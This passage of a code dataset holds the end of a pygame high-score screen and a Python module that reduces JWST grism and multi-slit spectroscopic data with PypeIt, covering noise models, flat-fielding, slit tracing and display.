pygame.image.load(self.bgPath).convert()\n self.screen.blit(self.bgImage,(0,0))\n\n def redrawAll(self):\n self.drawScore()\n\n def drawScore(self):\n # 170 + 39 \n # the bottom of the size \n frLeft = 327\n frRight = 581\n frBot = 170\n dHeight = 39\n frTop = frBot - dHeight\n font = pygame.font.Font(None, 35)\n index = 1\n for obj in self.allScore:\n name = obj.name\n score = obj.score\n formatStr = \" #%d %11s %9d\" % (index, name, score)\n index += 1\n # this will get a new surface \n line = font.render(formatStr, True, (0, 0, 0))\n # the following three lines are modified but cited from \n# http://nullege.com/codes/show/\n# src%40w%40r%40writing_games_tutorial-HEAD%40examples%40example4%40example1.py/\n# 221/pygame.font.Font.render/python\n lineRect = line.get_rect()\n lineRect.x = frLeft\n # index - 2 because index ++ \n lineRect.y = (frTop + frBot)/2 + (index - 2) * dHeight\n self.screen.blit(line,lineRect)\n\n # testCode\n def testSave(self):\n score = 100\n for i in range(6):\n name = chr(ord('a') + i)\n score -= 10\n self.addScores(OneScore(name, score))\n\n # [90, 80, 70, 60, 50, 40]\n","sub_path":"Project15112/highscore.py","file_name":"highscore.py","file_ext":"py","file_size_in_byte":4260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"531641234","text":"\nimport numpy as np\nfrom astropy.io import fits\nfrom astropy.stats import sigma_clipped_stats\nfrom pypeit.display import display\nfrom pypeit.core import fitting\nfrom gwcs import wcstools\nfrom matplotlib import pyplot as plt\nfrom jwst import datamodels\nfrom pypeit.utils import inverse\nDO_NOT_USE = datamodels.dqflags.pixel['DO_NOT_USE']\nfrom pypeit import msgs\nfrom pypeit.core import flat\nfrom pypeit.core import procimg\nfrom astropy.io import fits\nfrom astropy.wcs import WCS\nimport grismconf\n\n\n\nfrom IPython import embed\n\ndef compute_diff(scifile, bkgfile1, bkgfile2):\n sci_rate = datamodels.open(scifile)\n bkg1_rate = datamodels.open(bkgfile1)\n bkg2_rate = datamodels.open(bkgfile2)\n\n sci = sci_rate.data\n diff = sci_rate.data - (bkg1_rate.data + bkg2_rate.data)/2.0\n\n return sci, diff\n\ndef get_cuts(image):\n mean, med, sigma = sigma_clipped_stats(image, sigma_lower=5.0, sigma_upper=5.0)\n cut_min = mean - 1.0 * sigma\n cut_max = mean + 4.0 * sigma\n return (cut_min, cut_max)\n\ndef fit_slit(thismask, left_or_right, polyorder=2, function='legendre', debug=False):\n\n slit_width = np.sum(thismask, axis=1)\n med_slit_width = np.median(slit_width[slit_width > 0])\n nspec, nspat = thismask.shape\n spec_vec = np.arange(nspec, dtype=float)\n spat_vec = np.arange(nspat, dtype=float)\n spat_img, spec_img = np.meshgrid(spat_vec, spec_vec)\n\n dummy_spat_img = spat_img.copy()\n bad_value = +np.inf if 'left' in left_or_right else -np.inf\n dummy_spat_img[np.logical_not(thismask)] = bad_value\n slit_mask = np.min(dummy_spat_img, axis=1) if 'left' in left_or_right else np.max(dummy_spat_img, axis=1)\n good_for_slit = (slit_width > 0.5 * med_slit_width) & (slit_mask != bad_value)\n bad_for_slit = np.logical_not(good_for_slit)\n\n pypeitFit = fitting.robust_fit(spec_vec[good_for_slit], slit_mask[good_for_slit], polyorder, function=function,\n maxiter=25, lower=3.0, upper=3.0, maxrej=1, sticky=True, verbose=False,\n minx=0.0, maxx=float(nspec - 1))\n slit = pypeitFit.eval(spec_vec)\n if debug:\n plt.plot(spec_vec[good_for_slit], slit_mask[good_for_slit], 'k.')\n plt.plot(spec_vec[bad_for_slit], slit_mask[bad_for_slit], 'r.')\n plt.plot(spec_vec, slit, 'b')\n plt.show()\n\n\n return slit\n\ndef jwst_nircam_proc(rate_file, configfile, RA, DEC, kludge_err=1.0, noise_floor=0.01, saturation=65000):\n\n\n # TODO Use the spat_img which PypeIt can take, but we are not using!!\n rate_obj, raw_sub, var_tot_sub, var_poisson_sub, var_rnoise_sub, dq_sub, waveimg_sub, spat_img_sub = jwst_nircam_subimgs(\n configfile, RA, DEC, rate_file)\n t_eff = rate_obj.meta.exposure.effective_exposure_time\n\n # Read in the output after msa_flagging. Extract the sub-images, rotate to PypeIt format.\n rate = raw_sub.T\n rate_var_tot = var_tot_sub.T\n rate_var_poisson = var_poisson_sub.T\n rate_var_rnoise = var_rnoise_sub.T\n # TODO Check that the errors don't have nonsense from the flat field error budget\n dq = dq_sub.T\n # Now perform the image processing\n raw_counts = rate * t_eff\n raw_var_poisson = kludge_err ** 2 * rate_var_poisson * t_eff ** 2\n raw_var_rnoise = kludge_err ** 2 * rate_var_rnoise * t_eff ** 2\n # Is this correct? I'm not sure I should be using their poisson variance for the noise floor\n raw_var = procimg.variance_model(raw_var_rnoise, counts=raw_var_poisson, noise_floor=noise_floor)\n # TODO This is a hack until I can understand how to get rid of the hot pixels in the JWST variance arrays using DQ flags.\n # I don't know what the value of this parameter currently set to 20 should be?? Look into this via a github issue.\n # raw_gpm = (raw_var_rnoise < 20.0*ronoise**2) & (raw_var_poisson < saturation)\n raw_gpm = (raw_var_rnoise < saturation) & (raw_var_poisson < saturation)\n # raw_var_poisson + raw_var_rnoise # TODO Leaving out problematic flat field term from pipeline\n\n # This is the conversion between final2d and e2d, i.e. final2d = jwst_scale*e2d\n # total_flat = flatfield*pathloss*barshadow\n # flux_to_counts = t_eff / photom_conversion # This converts s2d outputs of flux to counts.\n # jwst_scale = photom_conversion/flatfield/pathloss/barshadow\n\n # TODO Perform the flat field correction yourself so as to update the noise model. Setting this to unit\n total_flat = np.ones_like(rate)\n finitemask = np.isfinite(rate, dtype=bool) # This was from NIRSPEC and may not be necessary\n total_flat_square = np.square(total_flat)\n\n count_scale = inverse(total_flat) # This is the quantity that goes into PypeIt for var modeling\n science, flat_bpm = flat.flatfield(raw_counts, total_flat)\n var_poisson, _ = flat.flatfield(raw_var_poisson, total_flat_square)\n base_var, _ = flat.flatfield(raw_var_rnoise, total_flat_square)\n var, _ = flat.flatfield(raw_var, total_flat_square)\n sciivar = inverse(var)\n dq_gpm = np.logical_not(dq & DO_NOT_USE)\n gpm = finitemask & dq_gpm & np.logical_not(flat_bpm) & (sciivar > 0.0) & raw_gpm\n\n nanmask = np.logical_not(finitemask)\n count_scale[nanmask] = 0.0\n science[nanmask] = 0.0\n var_poisson[nanmask] = 0.0\n base_var[nanmask] = 0.0\n var[nanmask] = 0.0\n sciivar[nanmask] = 0.0\n\n # TODO This is kludge city!!\n waveimg = 1e4 * waveimg_sub.T\n wave_min, wave_max = np.min(waveimg), np.max(waveimg)\n tilts = (waveimg - wave_min) / (wave_max - wave_min)\n spat_img = spat_img_sub.T\n\n return rate_obj, science, sciivar, gpm, dq_gpm, base_var, count_scale, finitemask, tilts, waveimg, spat_img\n\ndef jwst_nircam_subimgs(configfile, RA, DEC, rate_file, senscorrect=False, h5name=False, yoffset=0., yhsize=20., use_wcs=False):\n\n\n hdu = fits.open(rate_file)\n wcs = WCS(hdu[1].header)\n\n # Information about observing mode of this rate file\n h = hdu[0].header\n filt = h[\"FILTER\"] # Filter name, e.g. F410M\n grism = h[\"PUPIL\"][-1] # R or C\n module = h[\"MODULE\"] # Which NIRCAM module, A or B\n\n C = grismconf.Config(configfile)\n\n # Compute the position of the source in the image in pixel coordinates\n grism_with_wcs = datamodels.open(rate_file)\n\n world_to_pix = grism_with_wcs.meta.wcs.get_transform('world', 'detector')\n x0, y0, foo, foo2 = world_to_pix(RA, DEC, 0, 0)\n print('Target is at ', x0, y0)\n\n y0 = y0 + yoffset\n xref = x0 # 2048.\n yref = y0 # 2048.\n\n t = C.INVDISPL('+1', xref, yref, np.array([2.99, 4.21]))\n dx = C.DISPX('+1', xref, yref, t)\n dy = C.DISPY('+1', xref, yref, t)\n x_line = x0 + dx\n y_line = y0 + dy\n minx0 = np.max([0, np.int32(np.min(x_line))])\n maxx0 = np.min([2047, np.int32(np.max(x_line))]) # where do these numbers come from??\n miny0 = np.max([0, np.int32(np.min(y_line - yhsize))])\n maxy0 = np.min([2047, np.int32(np.max(y_line + yhsize))])\n\n data = grism_with_wcs.data\n var_tot = grism_with_wcs.err ** 2\n var_poisson = grism_with_wcs.var_poisson\n var_rnoise = grism_with_wcs.var_rnoise\n dq = grism_with_wcs.dq\n #data = hdu[\"SCI\"].data\n #err = hdu[\"ERR\"].data\n #dq = hdu[\"DQ\"].data\n\n # We trim our data to be the stamp containing the spectrum we want to extract\n data = data[miny0:maxy0 + 1, minx0:maxx0 + 1]\n var_tot = var_tot[miny0:maxy0 + 1, minx0:maxx0 + 1]\n var_poisson = var_poisson[miny0:maxy0 + 1, minx0:maxx0 + 1]\n var_rnoise = var_rnoise[miny0:maxy0 + 1, minx0:maxx0 + 1]\n dq = dq[miny0:maxy0 + 1, minx0:maxx0 + 1]\n print(data.shape, var_tot.shape, dq.shape) # , model0.shape)\n\n # These are the coordinates of all the pixels in our 2D stamp, but in the full image (wrt calibration is known)\n ys, xs = np.indices((maxy0 - miny0 + 1, maxx0 - minx0 + 1))\n # xs and ys are now the relative dx and dy offsets from the position of our source. They are both 2D arrays of x and y coordinates.\n xs = xs + minx0 - x0\n ys = ys + miny0 - y0\n\n # Depending on whether the grism disperse in the x or y direction, we use the INVDISPX or INVDISPY functions\n # to compute the value for t for every pixel in our 2D stamps\n if grism == \"R\":\n ts = C.INVDISPX(\"+1\", x0, y0, xs)\n dys = C.DISPY(\"+1\", x0, y0, ts) + ys - 2 * C.DISPY(\"+1\", x0, y0, ts)\n\n if grism == \"C\":\n ts = C.INVDISPY(\"+1\", x0, y0, ys)\n dys = C.DISPX(\"+1\", x0, y0, ts) + xs\n\n # Now compute the wavelength of every pixel in our 2D stamp\n ws = C.DISPL(\"+1\", x0, y0, ts)\n\n # Now, depending of whether things are in the row or col, we transpose things so that we can look at them properly (i.e. row direction)\n if grism == \"C\":\n # m = np.transpose(model0) # The model counts in each pixel\n l = np.transpose(ws) # The wavelength of each pixel\n d = np.transpose(data) # The data counts in each pixel\n var_tot_out = np.transpose(var_tot) # THe data error estimates in each pixel\n var_poisson_out = np.transpose(var_poisson) # THe data error estimates in each pixel\n var_rnoise_out = np.transpose(var_rnoise) # THe data error estimates in each pixel\n q = np.transpose(dq) # The data DQ in each pixel\n y = np.transpose(dys) # The cross-dispersion distance of each pixel from the trace\n\n if grism == \"R\":\n # m = model0\n l = ws\n d = data\n var_tot_out = var_tot\n var_poisson_out = var_poisson\n var_rnoise_out = var_rnoise\n q = dq\n y = dys\n\n # correct for the sensitivity function of the filter\n if senscorrect:\n lam = np.nanmean(l, axis=0)\n sens = 1E-18 * C.SENS[\"+1\"](lam) # always use the one for module A because Module B data has been rescaled???\n\n d = d / sens\n var_tot_out = var_tot / sens\n var_poisson_out = var_poisson / sens\n var_rnoise_out= var_rnoise / sens\n\n # TODO change variable names to be informative. Annoying that we have to recast\n return grism_with_wcs, d.astype(float), var_tot_out.astype(float), var_poisson_out.astype(float), var_rnoise_out.astype(float), \\\n q.astype(bool), l.astype(float), y.astype(float) # , m\n\n\ndef jwst_get_slits(finitemask, polyorder=5, function='legendre', debug=False):\n\n slit_left = fit_slit(finitemask, 'left', polyorder=polyorder, function=function, debug=debug)\n slit_righ = fit_slit(finitemask, 'righ', polyorder=polyorder, function=function, debug=debug)\n return slit_left, slit_righ\n\n\ndef jwst_proc(msa_data, t_eff, slit_slice, finitemask, pathloss, barshadow,\n kludge_err=1.0, ronoise=5.17, saturation=65000, noise_floor=0.01):\n\n\n #slit_slice, slit_left, slit_righ, slit_left_orig, slit_righ_orig, spec_vals_orig, src_trace_ra, src_trace_dec, dq, \\\n #ra, dec, waveimg, tilts, flatfield, pathloss, barshadow, photom_conversion, final = jwst_extract_subimgs(\n # final_slit, intflat_slit)\n\n # Now deal with the image processing\n #if not np.any(finitemask):\n # return (None,)*21\n\n # Read in the output after msa_flagging. Extract the sub-images, rotate to PypeIt format.\n rate = np.array(msa_data.data.T[slit_slice], dtype=float)\n rate_var_rnoise = np.array(msa_data.var_rnoise.T[slit_slice], dtype=float)\n rate_var_poisson = np.array(msa_data.var_poisson.T[slit_slice], dtype=float)\n # This is currently buggy as it includes flat field error\n # rate_var_tot = np.square(np.array(e2d_slit.err.T, dtype=float))\n dq = np.array(msa_data.dq.T[slit_slice], dtype=int)\n\n # Now perform the image processing\n raw_counts = rate*t_eff\n raw_var_poisson = kludge_err**2*rate_var_poisson*t_eff**2\n raw_var_rnoise = kludge_err**2*rate_var_rnoise*t_eff**2\n # Is this correct? I'm not sure I should be using their poisson variance for the noise floor\n raw_var = procimg.variance_model(raw_var_rnoise, counts = raw_var_poisson, noise_floor=noise_floor)\n # TODO This is a hack until I can understand how to get rid of the hot pixels in the JWST variance arrays using DQ flags.\n # I don't know what the value of this parameter currently set to 20 should be?? Look into this via a github issue.\n #raw_gpm = (raw_var_rnoise < 20.0*ronoise**2) & (raw_var_poisson < saturation)\n raw_gpm = (raw_var_rnoise < saturation) & (raw_var_poisson < saturation)\n #raw_var_poisson + raw_var_rnoise # TODO Leaving out problematic flat field term from pipeline\n\n # This is the conversion between final2d and e2d, i.e. final2d = jwst_scale*e2d\n # total_flat = flatfield*pathloss*barshadow\n #flux_to_counts = t_eff / photom_conversion # This converts s2d outputs of flux to counts.\n #jwst_scale = photom_conversion/flatfield/pathloss/barshadow\n total_flat = pathloss*barshadow\n total_flat_square = np.square(total_flat)\n\n count_scale = inverse(total_flat) # This is the quantity that goes into PypeIt for var modeling\n science, flat_bpm = flat.flatfield(raw_counts, total_flat)\n var_poisson, _ = flat.flatfield(raw_var_poisson, total_flat_square)\n base_var, _ = flat.flatfield(raw_var_rnoise, total_flat_square)\n var, _ = flat.flatfield(raw_var, total_flat_square)\n sciivar = inverse(var)\n dq_gpm = np.logical_not(dq & DO_NOT_USE)\n gpm = finitemask & dq_gpm & np.logical_not(flat_bpm) & (sciivar > 0.0) & raw_gpm\n\n nanmask = np.logical_not(finitemask)\n count_scale[nanmask] = 0.0\n science[nanmask] = 0.0\n var_poisson[nanmask] = 0.0\n base_var[nanmask] = 0.0\n var[nanmask] = 0.0\n sciivar[nanmask] = 0.0\n\n\n return science, sciivar, gpm, base_var, count_scale\n\ndef jwst_extract_subimgs(final_slit, intflat_slit):\n\n # The various multiplicative calibrations we need.\n slit_name = final_slit.name\n waveimg = np.array(final_slit.wavelength.T, dtype=float)\n slit_wcs = final_slit.meta.wcs\n x, y = wcstools.grid_from_bounding_box(slit_wcs.bounding_box, step=(1, 1))\n calra, caldec, calwave = slit_wcs(x, y)\n ra = calra.T\n dec = caldec.T\n\n # get the source RA and Dec coordinates from the metadata (also located in the header of the fits SCI extension)\n nspec, nspat = ra.shape\n src_ra, src_dec= final_slit.meta.target.ra, final_slit.meta.target.dec\n\n cal_spat = np.arange(nspat) # spatial position\n src_trace_ra = np.zeros(nspec) # Array to hold the source_RA as a function of spectral position\n src_trace_dec = np.zeros(nspec) # Array to hold the source_DEC as a function of spectral position\n for ispec in range(nspec):\n ra_vs_spat = calra[:, ispec] #\n # Interpolate y-pixel as a functio of RA onto the source RA\n src_trace_ra[ispec] = np.interp(src_ra, ra_vs_spat[np.isfinite(ra_vs_spat)],\n cal_spat[np.isfinite(ra_vs_spat)])\n dec_vs_spat = caldec[:, ispec]\n src_trace_dec[ispec] = np.interp(src_dec, dec_vs_spat[np.isfinite(dec_vs_spat)], cal_spat[np.isfinite(dec_vs_spat)])\n\n\n waveimg_from_wcs = calwave.T\n # Sometimes this fails at the 1e-4 level and disagreess about nans???\n #assert np.allclose(waveimg, waveimg_from_wcs, rtol=1e-3, atol=1e-3, equal_nan=True)\n\n\n flatfield = np.array(intflat_slit.data.T, dtype=float) #if intflat_slit is not None else np.ones_like(pathloss)\n pathloss = np.array(final_slit.pathloss_uniform.T, dtype=float) if final_slit.source_type == 'EXTENDED' else \\\n np.array(final_slit.pathloss_point.T, dtype=float)\n if pathloss.shape == (0,0):\n msgs.warn('No pathloss for slit {0}'.format(slit_name) + ', setting to 1.0')\n pathloss = np.ones_like(flatfield)\n\n barshadow = np.array(final_slit.barshadow.T, dtype=float)\n if barshadow.shape == (0,0):\n msgs.warn('No barshadow for slit {0}'.format(slit_name) + ', setting to 1.0')\n barshadow = np.ones_like(flatfield)\n\n photom_conversion = final_slit.meta.photometry.conversion_megajanskys\n final = np.array(final_slit.data.T, dtype=float)\n\n\n # Generate some tilts and a spatial image\n finitemask = np.isfinite(waveimg)\n # Get slit bounadries\n slit_left, slit_righ = jwst_get_slits(finitemask)\n\n waveimg = 1e4*waveimg\n waveimg[np.logical_not(finitemask)] = 0.0\n wave_min, wave_max = np.min(waveimg[finitemask]), np.max(waveimg[finitemask])\n\n tilts = np.zeros_like(waveimg)\n tilts[finitemask] = (waveimg[finitemask] - wave_min) / (wave_max - wave_min)\n\n # TODO Fix this spat_pix to make it increasing with pixel. For now don't use it\n # This currnetly depends on poisition angle which I need to hack to fix\n # ra_min, ra_max = np.min(ra_sub[finitemask_sub]), np.max(ra_sub[finitemask_sub])\n # spat_pix_sub = np.zeros_like(ra_sub)\n # spat_pix_sub[finitemask_sub] = spat_lo + (ra[finitemask_sub] - ra_min) / (ra_max - ra_min) * (nspat_sub - 1)\n\n\n\n ########################\n # The image segment being used for each slit\n spec_lo = final_slit.xstart - 1\n spec_hi = spec_lo + final_slit.xsize\n spat_lo = final_slit.ystart - 1\n spat_hi = spat_lo + final_slit.ysize\n # slice object for the segment\n slit_slice = np.s_[spec_lo: spec_hi, spat_lo: spat_hi]\n\n #embed()\n #rate = np.array(e2d_slit.data.T, dtype=float)\n #rate_var_rnoise = np.array(e2d_slit.var_rnoise.T, dtype=float)\n #rate_var_poisson = np.array(e2d_slit.var_poisson.T, dtype=float)\n # This is currently buggy as it includes flat field error\n #rate_var_tot = np.square(np.array(e2d_slit.err.T, dtype=float))\n dq = np.array(final_slit.dq.T, dtype=int)\n\n slit_left_orig = spat_lo + slit_left\n slit_righ_orig = spat_lo + slit_righ\n spec_vals_orig = spec_lo + np.arange(spec_hi - spec_lo)\n\n\n return slit_slice, slit_left, slit_righ, slit_left_orig, slit_righ_orig, spec_vals_orig, src_trace_ra, src_trace_dec, dq, \\\n ra, dec, finitemask, waveimg, tilts, flatfield, pathloss, barshadow, photom_conversion, final\n\n\ndef jwst_show_msa(sci_rate, final2d, clear=True):\n\n sci_data = sci_rate.data.T\n viewer_sci, ch_sci = display.show_image(sci_data, cuts=get_cuts(sci_data), chname='raw rate', clear=clear)\n\n for islit, slit in enumerate(final2d.slits):\n # Read in data print out slit name\n slit_name = final2d.slits[islit].name\n calsci = np.array(final2d.slits[islit].data, dtype=float) # contains the pixel data from the cal file (SCI extension)\n print('Slit={:s}'.format(slit_name))\n nspat, nspec = calsci.shape\n\n ########################\n # Plot the image segment being used for each slit\n xlo = final2d.slits[islit].xstart - 1\n xhi = xlo + final2d.slits[islit].xsize\n ylo = final2d.slits[islit].ystart - 1\n yhi = ylo + final2d.slits[islit].ysize\n # This is the segment of the 2d image\n slit_slice = np.s_[ylo: yhi, xlo: xhi]\n # xvals = xlo + np.arange(xhi - xlo)\n # yvals = ylo + np.arange(yhi - ylo)\n slit_left = np.full(nspec, ylo)\n slit_righ = np.full(nspec, yhi)\n spec_val = xlo + np.arange(xhi - xlo)\n display.show_slits(viewer_sci, ch_sci, slit_left, slit_righ, spec_vals=spec_val, pstep=1,\n slit_ids=np.array([int(slit_name)]))\n\n\ndef jwst_show_spec2(slit, intflat_slit=None, clear=True, emb=False):\n\n\n # Read in data print out slit name\n slit_name = slit.name\n print('Slit={:s}'.format(slit_name))\n calsci = np.array(slit.data, dtype=float) # contains the pixel data from the cal file (SCI extension)\n nspat, nspec = calsci.shape\n\n\n ########################\n # Plot the image segment being used for each slit\n #xlo = final2d.slits[islit].xstart - 1\n #xhi = xlo + final2d.slits[islit].xsize\n #ylo = final2d.slits[islit].ystart - 1\n #yhi = ylo + final2d.slits[islit].ysize\n # This is the segment of the 2d image\n #slit_slice = np.s_[ylo: yhi, xlo: xhi]\n # xvals = xlo + np.arange(xhi - xlo)\n # yvals = ylo + np.arange(yhi - ylo)\n #slit_left = np.full(nspec, ylo)\n #slit_righ = np.full(nspec, yhi)\n #spec_val = xlo + np.arange(xhi - xlo)\n #viewer_sci, ch_sci = display.show_image(rawscience.T, cuts=get_cuts(rawscience), chname='raw', clear=clear)\n #display.show_slits(viewer_sci, ch_sci, slit_left, slit_righ, spec_vals=spec_val, pstep=1,\n # slit_ids=np.array([int(slit_name)]))\n\n # get the source RA and Dec coordinates from the metadata (also located in the header of the fits SCI extension)\n source_ra = slit.meta.target.ra\n source_dec = slit.meta.target.dec\n print('catalog RA,DEC:', source_ra, source_dec)\n # determine the wavelength scale of the cal data for plotting purposes\n # get the data model WCS object. This example is from the fixed slit notebook\n slit_wcs = slit.meta.wcs\n x, y = wcstools.grid_from_bounding_box(slit_wcs.bounding_box, step=(1, 1))\n calra, caldec, calwave = slit_wcs(x, y)\n\n ## Old way from fixed slit notebook\n #y1, x1 = np.mgrid[:nspat,:nspec] # grid of pixel x,y indices\n #det2sky = slit_wcs.get_transform('detector','world') # the coordinate transform from detector space (pixels) to sky (RA, DEC in degrees)\n #calra, caldec, calwave = det2sky(x1, y1) # RA, Dec, wavelength (microns) for each pixel\n cal_spec = np.arange(nspec) # spectral position\n cal_spat = np.arange(nspat) # spatial position\n cal_src_from_ra_spat = np.zeros(nspec) # Array to hold the source_RA as a function of spectral position\n cal_src_from_dec_spat = np.zeros(nspec) # Array to hold the source_DEC as a function of spectral position\n for ispec in range(nspec):\n ra_vs_spat = calra[:, ispec] #\n # Interpolate y-pixel as a functio of RA onto the source RA\n cal_src_from_ra_spat[ispec] = np.interp(source_ra, ra_vs_spat[np.isfinite(ra_vs_spat)], cal_spat[np.isfinite(ra_vs_spat)])\n dec_vs_spat = caldec[:, ispec]\n cal_src_from_dec_spat[ispec] = np.interp(source_dec, dec_vs_spat[np.isfinite(dec_vs_spat)], cal_spat[np.isfinite(dec_vs_spat)])\n\n # Now transpose everything to PypeIt convention for viewing.\n\n # plot the unrectified calibrated 2D spectrum\n waveimg = calwave.T if (slit.wavelength.shape == (0,0)) else np.array(slit.wavelength.T,dtype=float)\n pathloss = np.array(slit.pathloss_uniform.T,dtype=float) if slit.source_type == 'EXTENDED' else \\\n np.array(slit.pathloss_point.T,dtype=float)\n barshadow = np.array(slit.barshadow.T,dtype=float)\n viewer_data, ch_data = display.show_image(calsci.T, waveimg = waveimg, cuts = get_cuts(calsci.T),\n chname=slit_name + '_data', clear=clear)\n viewer_wave, ch_wave = display.show_image(waveimg, waveimg=waveimg, chname=slit_name + '_wave')\n viewer_ra, ch_ra = display.show_image(calra.T, waveimg=waveimg, chname=slit_name + '_RA')\n if intflat_slit is not None:\n flat = np.array(intflat_slit.data.T,dtype=float)\n viewer_flat, ch_flat = display.show_image(flat, waveimg=waveimg, chname=slit_name + '_flat')\n display.show_trace(viewer_data, ch_data, cal_src_from_ra_spat, trc_name='RA', pstep=1, color='#f0e442')\n display.show_trace(viewer_data, ch_data, cal_src_from_dec_spat, trc_name='DEC', pstep=1, color='#f0e442')\n if pathloss.shape != (0,0):\n viewer_path, ch_path = display.show_image(pathloss, waveimg=waveimg, chname=slit_name + '_pathloss')\n if barshadow.shape != (0,0):\n viewer_bar, ch_bar = display.show_image(barshadow, waveimg=waveimg, chname=slit_name + '_barshadow')\n\n if emb:\n embed(header='Slit={:s}'.format(slit_name))\n\n\n\n# TODO Deprecated. This won't work now that I realize slits can overlap. So just use it as a visualization tool or something??\ndef jwst_populate_calibs(nspec, nspat, e2d_multi, final_multi, intflat_multi):\n\n ra = np.zeros((nspec, nspat))\n dec = np.zeros((nspec, nspat))\n waveimg = np.zeros((nspec, nspat))\n tilts = np.zeros((nspec, nspat))\n # The product of these three are the total flat so we instantiate all to 1.0\n flatfield = np.ones((nspec, nspat))\n pathloss = np.ones((nspec, nspat))\n barshadow = np.ones((nspec, nspat))\n photom_conversion = np.zeros((nspec, nspat)) # Currently a constant, but build the possiibility to have it be an image\n calwebb_final = np.zeros((nspec, nspat))\n subimg_count = np.zeros((nspec, nspat), dtype=int)\n slit_name_mask = np.zeros((nspec, nspat), dtype=int)\n\n # slit boundary stuff\n nslits = len(final_multi.slits)\n slit_left = np.zeros((nspec, nslits))\n slit_righ = np.zeros((nspec, nslits))\n spec_min = np.zeros(nslits)\n spec_max = np.zeros(nslits)\n\n # TODO print out a warning message here about the slits that are bad, i.e. nan everwhere\n reduce_gpm = np.ones(nslits, dtype=bool)\n meta_list = []\n\n for islit in range(nslits):\n # Read in data print out slit name\n slit_name = final_multi.slits[islit].name\n meta_list.append(final_multi.slits[islit].meta)\n\n slit_left_sub, slit_right_sub, rate_sub, rate_var_rnoise_sub, rate_var_poisson_sub, rate_var_tot_sub, \\\n ra_sub, dec_sub, waveimg_sub, tilts_sub, flatfield_sub, pathloss_sub, barshadow_sub, photom_conversion_sub, \\\n final_sub = jwst_extract_subimgs(e2d_multi.slits[islit], final_multi.slits[islit], intflat_multi.slits[islit])\n\n # Determine the slit boundaries using the waveimg\n finitemask_sub = np.isfinite(waveimg_sub)\n if not np.any(finitemask_sub):\n reduce_gpm[islit] = False\n msgs.warn('All nan wavelengths for Slit={:s}. Not extracting calibrations'.format(slit_name))\n else:\n #msgs.info('Extracting calibrations for Slit={:s}'.format(slit_name))\n\n ########################\n # The image segment being used for each slit\n spec_lo = final_multi.slits[islit].xstart - 1\n spec_hi = spec_lo + final_multi.slits[islit].xsize\n spat_lo = final_multi.slits[islit].ystart - 1\n spat_hi = spat_lo + final_multi.slits[islit].ysize\n # slice object for the segment\n slit_slice = np.s_[spec_lo: spec_hi, spat_lo: spat_hi]\n\n # Get slit bounadries\n nspec_sub, nspat_sub = ra_sub.shape\n sub_slit_left, sub_slit_righ = jwst_get_slits(finitemask_sub)\n\n\n\n # TODO Fix this spat_pix to make it increasing with pixel. For now don't use it\n # This currnetly depends on poisition angle which I need to hack to fix\n #ra_min, ra_max = np.min(ra_sub[finitemask_sub]), np.max(ra_sub[finitemask_sub])\n #spat_pix_sub = np.zeros_like(ra_sub)\n #spat_pix_sub[finitemask_sub] = spat_lo + (ra[finitemask_sub] - ra_min) / (ra_max - ra_min) * (nspat_sub - 1)\n\n slit_left[spec_lo: spec_hi, islit] = spat_lo + sub_slit_left\n slit_righ[spec_lo: spec_hi, islit] = spat_lo + sub_slit_righ\n # This is a hack for now until we figure out how to deal with spec_min and spec_max slits.\n # I'm just setting the boundaries to be everywhere the last defined boundary location in the sub-image\n slit_left[:spec_lo, islit] = spat_lo + sub_slit_left[0]\n slit_left[spec_hi:, islit] = spat_lo + sub_slit_left[-1]\n slit_righ[:spec_lo, islit] = spat_lo + sub_slit_righ[0]\n slit_righ[spec_hi:, islit] = spat_lo + sub_slit_righ[-1]\n\n spec_min[islit] = spec_lo\n spec_max[islit] = spec_hi\n\n # Populate the 2d images in the regions where the JWST calibrations are finite\n ra[slit_slice][finitemask_sub] = ra_sub[finitemask_sub]\n dec[slit_slice][finitemask_sub] = dec_sub[finitemask_sub]\n waveimg[slit_slice][finitemask_sub] = waveimg_sub[finitemask_sub]\n tilts[slit_slice][finitemask_sub] = tilts_sub[finitemask_sub]\n flatfield[slit_slice][finitemask_sub] = flatfield_sub[finitemask_sub]\n pathloss[slit_slice][finitemask_sub] = pathloss_sub[finitemask_sub]\n barshadow[slit_slice][finitemask_sub] = barshadow_sub[finitemask_sub]\n photom_conversion[slit_slice][finitemask_sub] = photom_conversion_sub # Currently just a float but may be an image in the future\n calwebb_final[slit_slice][finitemask_sub] = final_sub[finitemask_sub]\n subimg_count[slit_slice][finitemask_sub] += 1\n\n return reduce_gpm, ra, dec, waveimg, tilts, flatfield, pathloss, barshadow, photom_conversion, calwebb_final, subimg_count, \\\n slit_left, slit_righ, spec_min, spec_max, meta_list\n\n\ndef jwst_proc_old(e2d_slit, final_slit, intflat_slit=None, kludge_err=1.0):\n\n\n # Try to reverse engineer all the things they multiply into the data\n slit_name = e2d_slit.name\n\n t_eff = e2d_slit.meta.exposure.effective_exposure_time\n # TODO I don't know how the t_eff quantity is defined. Better would be some proxy for the exposure time per pixel\n # The science data is divided by (flat*pathloss*barshadow) and then multiplied by photom_conversion. Since\n # we work in units of counts, we divide by the photom conversion and multiply by t_eff.\n\n # This is the raw e2d data before the pipeline does idiotic things\n raw_data_counts = np.array(e2d_slit.data.T, dtype=float)*t_eff\n raw_var_poisson = kludge_err**2*np.array(e2d_slit.var_poisson.T, dtype=float)*t_eff**2\n raw_var_rnoise = kludge_err**2*np.array(e2d_slit.var_rnoise.T, dtype=float)*t_eff**2\n raw_var = kludge_err**2*np.square(np.array(e2d_slit.err.T, dtype=float))*t_eff**2\n\n photom_conversion = final_slit.meta.photometry.conversion_megajanskys\n pathloss = np.array(final_slit.pathloss_uniform.T, dtype=float) if final_slit.source_type == 'EXTENDED' else \\\n np.array(final_slit.pathloss_point.T, dtype=float)\n if pathloss.shape == (0,0):\n msgs.warn('No pathloss for slit {0}'.format(slit_name) + ', setting to 1.0')\n pathloss = np.ones_like(raw_data_counts)\n flatfield = np.array(intflat_slit.data.T, dtype=float) if intflat_slit is not None else np.ones_like(raw_data_counts)\n barshadow = np.array(final_slit.barshadow.T, dtype=float)\n\n # This is the conversion between final2d and e2d, i.e. final2d = jwst_scale*e2d\n jwst_scale = photom_conversion / flatfield / pathloss / barshadow\n flux_to_counts = t_eff / photom_conversion # This converts s2d outputs of flux to counts.\n\n #science = np.array(e2d_slit.data.T, dtype=float) * flux_to_counts\n\n total_flat = flatfield * pathloss * barshadow\n total_flat_square = np.square(total_flat)\n count_scale = inverse(total_flat) # This is the quantity that goes into PypeIt\n\n science, flat_bpm = 